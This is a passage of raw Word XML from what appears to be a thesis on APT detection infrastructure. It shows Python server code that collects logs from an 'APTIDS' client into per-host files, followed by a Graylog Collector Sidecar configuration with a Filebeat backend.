          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            sock2.bind((host, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            uport = sock2.getsockname()[</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            sock2.close()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            csock.send(str(uport) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            thread.start_new_thread(DataChannel, (uport, ComputerName, WindowsVersion))</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">__name__ == </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Server()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="00BA1B8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2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF2">
      <w:r>
        <w:t xml:space="preserve">On the first connection from APTIDS, APTIDS sends its computer name and windows version to Server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">            ComputerName=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>csock.recv(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            WindowsVersion = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>csock.recv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="00B81AF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF2">
      <w:r>
        <w:t>Server then finds an available port and sends back to APTIDS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sock2 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">sock2.bind((host, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>uport = sock2.getsockname()[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>sock2.close()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">csock.send(str(uport) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="00B81AF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2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF2">
      <w:r>
        <w:t>Server creates new thread for binding and listening on that port, and use computer name and windows version for writing log to file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="003A23CE">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22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DataChannel(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E4E4FF"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, computerName, windowsVersion):</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock.bind((host, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E4E4FF"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock.listen(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (csock, caddr) = sock.accept()</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        data = csock.recv(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)[:-</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">print </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        logFile = open(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"{0}.{1}"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.format(computerName, windowsVersion) + </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>".log"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"ab"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        logFile.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[{0}_{1}] "</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.format(computerName, windowsVersion) + data+</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        logFile.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRPr="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="003A23CE">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22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="003A23CE" w:rsidP="00B81AF2">
      <w:r>
        <w:t>As we discussed before, Server will store log with the filename format as “Computer Name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”.“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Windows Version”.logs .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="003A23CE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Graylog Collector Sidecar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C00E3F" w:rsidRDefault="00C00E3F" w:rsidP="00C00E3F">
      <w:r>
        <w:t>In DLCH, we implemented Graylog Collector Sidecar for collecting log and sending to Graylog Server.</w:t>
      </w:r>
      <w:r w:rsidR="00067ED0">
        <w:t xml:space="preserve"> Graylog Collector Sidecar is configured to communicate with Graylog Server at Rest API (port 9000). In this thesis, we use Filebeat as the working backend for working with Graylog Server.</w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:t xml:space="preserve"> The configuration file is stored in </w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D" w:rsidRPr="00C92C7D">
        <w:t>/etc/graylog/collector-sidecar/collector_sidecar.yml</w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:t xml:space="preserve"> which contains the following options.</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server_url: http://</w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&lt;Graylog-server-ip&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00067ED0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>:9000/api/</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update_interval: 10</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tls_skip_verify: false</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send_status: true</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list_log_files:</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node_id: graylog-collector-sidecar</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collector_id: file:/etc/graylog/collector-sidecar/collector-id</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cache_path: /var/cache/graylog/collector-sidecar</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log_path: /var/log/graylog/collector-sidecar</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log_rotation_time: 86400</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log_max_age: 604800</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tags:</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 apt_1</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backends:</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 name: nxlog</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enabled: false</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binary_path: /usr/bin/nxlog</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configuration_path: /etc/graylog/collector-sidecar/generated/nxlog.conf</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 name: filebeat</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      enabled: true</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binary_path: /usr/bin/filebeat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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configuration_path: /etc/graylog/collector-sidecar/generated/filebeat.yml</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p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="0047170D" w:rsidP="0047170D">
      <w:r>
        <w:t xml:space="preserve">Graylog Collector Sidecar </w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:t xml:space="preserve">defines </w:t>
      </w:r>
      <w:r>
        <w:t>some essential information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047170D" w:rsidRDefault="0047170D" w:rsidP="0047170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">server_url: </w:t>
      </w:r>
      <w:r w:rsidR="00CF1493">
        <w:t>The URL path Graylog Collector Sidecar uses to communicate with Graylog Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1493" w:rsidRDefault="00CF1493" w:rsidP="0047170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tags: The tags name of this current log stream. Each log stream can </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067ED0" w:rsidRDefault="00D907E1" w:rsidP="00D907E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>backends: Working backends used for communicating with Graylog Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92C7D" w:rsidRDefault="00C92C7D" w:rsidP="00C92C7D">
      <w:r>
        <w:t>Graylog Collector Sidecar does not specify any file or directory for collecting log, it will receive the configuration for file and folder input when connects to the Graylog server.</w:t>
      </w:r>
    </w:p>
